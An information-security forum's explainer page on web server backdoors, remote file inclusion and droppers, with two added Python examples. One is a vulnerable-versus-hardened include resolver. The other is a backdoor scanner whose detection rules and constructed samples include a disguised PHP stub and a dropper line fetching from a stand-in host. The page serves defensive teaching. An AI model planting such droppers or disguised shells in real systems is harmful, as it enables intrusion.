
Irish Information Security Forum

Backdoor Attacks - Cybersecurity

What is a backdoor?

A backdoor is malware that bypasses normal authentication procedures to gain access to a system. It gives an attacker remote access to resources within an application, such as databases and file servers, together with the ability to issue system commands and install further malware.

Backdoor installation can be achieved, for example, by taking advantage of vulnerable components in a web application. Once installed, a backdoor is difficult to detect because its files tend to be heavily obfuscated.

Web server backdoors are used for a number of malicious activities, including:

  • Data theft
  • Website defacing
  • Server hijacking
  • The launching of distributed denial of service (DDoS) attacks
  • Infecting website visitors (watering hole attacks)
  • Advanced persistent threat (APT) assaults

Backdoor trojan installation

The most prevalent backdoor installation method is remote file inclusion (RFI), an attack that exploits vulnerabilities in applications that dynamically reference external scripts. In an RFI scenario, the referencing function is tricked into downloading a backdoor trojan from a remote host controlled by the attacker.
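To make the RFI sink concrete, here is an added example in Python (not code from the page, and not any particular product's code): an include resolver that passes the request parameter straight through, beside a hardened resolver that allow-lists the logical page name and confines the resolved path to the include directory. The `fetch` callable stands in for a URL-aware file opener, which is how PHP's `include` behaves with `allow_url_include` enabled; the page names, the `.inc` layout and the address 198.51.100.7 (a documentation range) are assumptions made for the example, and no network access takes place.

```python
"""Remote file inclusion: an include resolver that trusts its parameter, beside a
hardened one. Added example; nothing here talks to the network."""
import os
import re
import tempfile

# Anything with a URL scheme prefix: http://, ftp://, data:, php:// and so on.
URL_SCHEME = re.compile(r"^[a-z][a-z0-9+.\-]*:", re.I)

# Assumed set of legitimate page names the application may include.
ALLOWED_PAGES = {"home", "about", "contact"}


def unsafe_include(page, base_dir, fetch):
    """Vulnerable pattern: the request parameter becomes the include target.
    `fetch` stands in for a URL-aware file opener, so a URL is retrieved from the
    remote host and returned as if it were local page content (the RFI sink)."""
    if URL_SCHEME.match(page):
        return fetch(page)
    with open(os.path.join(base_dir, page), encoding="utf-8") as f:
        return f.read()


def safe_include(page, base_dir):
    """Hardened form: allow-list the logical name, build the path yourself, and
    confine the resolved path to base_dir, so neither URLs nor traversal get through."""
    if page not in ALLOWED_PAGES:
        raise ValueError("page not in allow-list: %r" % page)
    base_dir = os.path.realpath(base_dir)
    path = os.path.realpath(os.path.join(base_dir, page + ".inc"))
    if os.path.commonpath([base_dir, path]) != base_dir:
        raise ValueError("resolved include escapes base_dir: %r" % path)
    with open(path, encoding="utf-8") as f:
        return f.read()


def demo():
    """Exercise both resolvers against a constructed include directory and return
    what each did, keyed by the input it was given."""
    root = tempfile.mkdtemp()
    with open(os.path.join(root, "home.inc"), "w", encoding="utf-8") as f:
        f.write("<h1>Home</h1>")
    fetched = []

    def fake_fetch(url):  # records what the unsafe sink would have downloaded
        fetched.append(url)
        return "<?php /* constructed stand-in for a remote backdoor script */ ?>"

    remote = "http://198.51.100.7/shell.txt"  # documentation address, not a real host
    results = {
        "unsafe:home.inc": unsafe_include("home.inc", root, fake_fetch),
        "unsafe:remote": unsafe_include(remote, root, fake_fetch),
        "safe:home": safe_include("home", root),
    }
    for bad in (remote, "../../etc/passwd", "php://input", "home.inc"):
        try:
            safe_include(bad, root)
            results["safe:" + bad] = "ALLOWED"
        except ValueError:
            results["safe:" + bad] = "rejected"
    results["fetched"] = fetched
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print("%-32s %s" % (key, value))
```

The unsafe resolver hands the remote URL to its opener and returns whatever the attacker's host serves, which is exactly the "referencing function tricked into downloading" step. The hardened resolver never treats the parameter as a path at all: the allow-list rejects URLs, stream wrappers and traversal before any filesystem call, and the realpath confinement is defence in depth for the case where the allow-list is later loosened.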


Attackers identify targets using scanners that locate websites running unpatched or outdated components which allow file injection. Once a scanner finds such a site, the attacker leverages the vulnerability to install the backdoor. Once installed, it can be accessed at any time, even after the vulnerability that enabled its insertion has been patched.


Backdoor trojan insertion is often done in two steps to bypass security rules that block the upload of files above a certain size. The first step installs a dropper, a small file whose sole function is to retrieve a bigger file from a remote location. The dropper then initiates the second step: downloading and installing the backdoor script on the server. This is why upload controls that look only at file size are weak; the content and type of an uploaded file need to be inspected as well.


Once installed, backdoors are very hard to find because they are almost always masked through alias names (for example, script code stored under an image or text extension) and code obfuscation, sometimes with multiple layers of encoding or encryption.


Detection is further complicated when applications are built on external frameworks that use third-party plugins; these sometimes carry their own vulnerabilities or built-in backdoors. Scanners that rely on heuristic and signature-based rules may not detect hidden code in such frameworks.
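The dropper pattern, the alias names and obfuscation layers, and the limits of signature-only scanning described above can be exercised with a small indicator scanner. The following is an added example written for this page in Python, not a tool the page describes: it walks a web root and reports eval-of-decoded-payload chains, request-driven command execution, dropper-style remote fetch-and-write, PHP code stored under a non-code extension, and long high-entropy string literals. The rule set, the entropy threshold and the three sample files (written to a temporary directory; 198.51.100.7 is a documentation address) are constructed assumptions for illustration.

```python
"""Scan a web root for backdoor indicators: obfuscated eval chains, request-driven
command execution, dropper-style fetch-and-write, PHP code under a non-code
extension, and long high-entropy literals. Added example with constructed samples."""
import base64
import math
import os
import re
import tempfile

# (rule name, pattern). A small, illustrative rule set, not a complete signature base.
RULES = [
    ("eval-of-decoded-payload",
     re.compile(r"\beval\s*\(\s*(base64_decode|gzinflate|gzuncompress|str_rot13|strrev)\s*\(", re.I)),
    ("request-to-exec",
     re.compile(r"\b(system|exec|shell_exec|passthru|popen|proc_open)\s*\(\s*\$_(GET|POST|REQUEST|COOKIE)\b", re.I)),
    ("remote-fetch-and-write",   # dropper: pull a bigger file from a remote host and save it
     re.compile(r"\b(file_put_contents|fwrite)\s*\(.*\b(file_get_contents|curl_exec|fopen)\s*\(\s*['\"]?https?://", re.I | re.S)),
]
PHP_OPEN_TAG = re.compile(r"<\?(php\b|=)", re.I)
CODE_EXTENSIONS = {".php", ".phtml", ".php5", ".phar", ".inc"}
LONG_LITERAL = re.compile(r"['\"]([A-Za-z0-9+/=]{80,})['\"]")
ENTROPY_THRESHOLD = 4.5   # bits per character; assumed cut-off, tune on your own code base


def shannon_entropy(s):
    """Bits per character of s (0 for empty); encoded or encrypted blobs score high."""
    if not s:
        return 0.0
    n = len(s)
    counts = {}
    for ch in s:
        counts[ch] = counts.get(ch, 0) + 1
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def scan_source(relpath, text):
    """Return the list of rule names that fire for one file's contents."""
    findings = [name for name, rx in RULES if rx.search(text)]
    ext = os.path.splitext(relpath)[1].lower()
    if PHP_OPEN_TAG.search(text) and ext not in CODE_EXTENSIONS:
        findings.append("php-code-in-non-code-file")   # alias name: a "jpg" that is really a script
    if any(shannon_entropy(lit) > ENTROPY_THRESHOLD for lit in LONG_LITERAL.findall(text)):
        findings.append("high-entropy-literal")
    return findings


def scan_tree(root):
    """Walk root and return {relative path: findings} for every regular file."""
    report = {}
    for dirpath, _, filenames in os.walk(root):
        for fn in filenames:
            full = os.path.join(dirpath, fn)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            with open(full, "r", encoding="utf-8", errors="replace") as f:
                report[rel] = scan_source(rel, f.read())
    return report


# Constructed sample web root: a benign page, an obfuscated shell hiding as an image,
# and a dropper. The decoded payload is never executed by this script.
SAMPLES = {
    "index.php": '<?php\n$title = "Welcome";\necho "<h1>" . htmlspecialchars($title) . "</h1>";\n',
    "uploads/avatar.jpg": "<?php eval(base64_decode('%s'));\n" % base64.b64encode(
        b'if (isset($_REQUEST["c"])) { echo "constructed sample: " . $_REQUEST["c"]; }').decode(),
    "wp-content/cache.php": "<?php file_put_contents(__DIR__ . '/x.php', "
                            "file_get_contents('http://198.51.100.7/x.txt'));\n",
}


def build_sample_tree():
    """Write the constructed samples into a fresh temporary directory and return its path."""
    root = tempfile.mkdtemp()
    for rel, content in SAMPLES.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as f:
            f.write(content)
    return root


if __name__ == "__main__":
    for rel, findings in sorted(scan_tree(build_sample_tree()).items()):
        print("%-22s %s" % (rel, ", ".join(findings) or "clean"))
```

Run stand-alone it prints one line per file with the rules that fired. The patterns catch the textbook forms; real shells vary the function names, split strings and stack encoders, which is the limitation the paragraph above describes, so the entropy and extension-mismatch checks matter more in practice than the literal signatures, and the output is a triage list to review rather than a verdict.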


Even if a backdoor is detected, typical mitigation methods (or even a system reinstallation) may not remove it, particularly where the backdoor has established a persistent presence in rewritable memory, such as device firmware, that a reinstall does not touch.


If you are interested in finding out more about the IISF, or would like to attend one of our Chapter Meetings as an invited guest, please contact the IISF Secretary:

By email:
secretary@iisf.ie

By post:

David Cahill

Information Security

GPO, 1-117
D01 F5P2

Enhance your Cybersecurity knowledge and learn from those at the coalface of information Security in Ireland

FORUM SPONSORS

We would like to thank these generous sponsors for their support. 

CrowdStrike

Zscaler

Sponsors are featured prominently throughout the IISF.IE website and social media channels, and enjoy other benefits.


© iiSf. All rights reserved. CRN: 3400036GH  - Privacy Statement  - Sponsorship  - Cybersecurity News Topics  - Cybersecurity Resources  - Produced by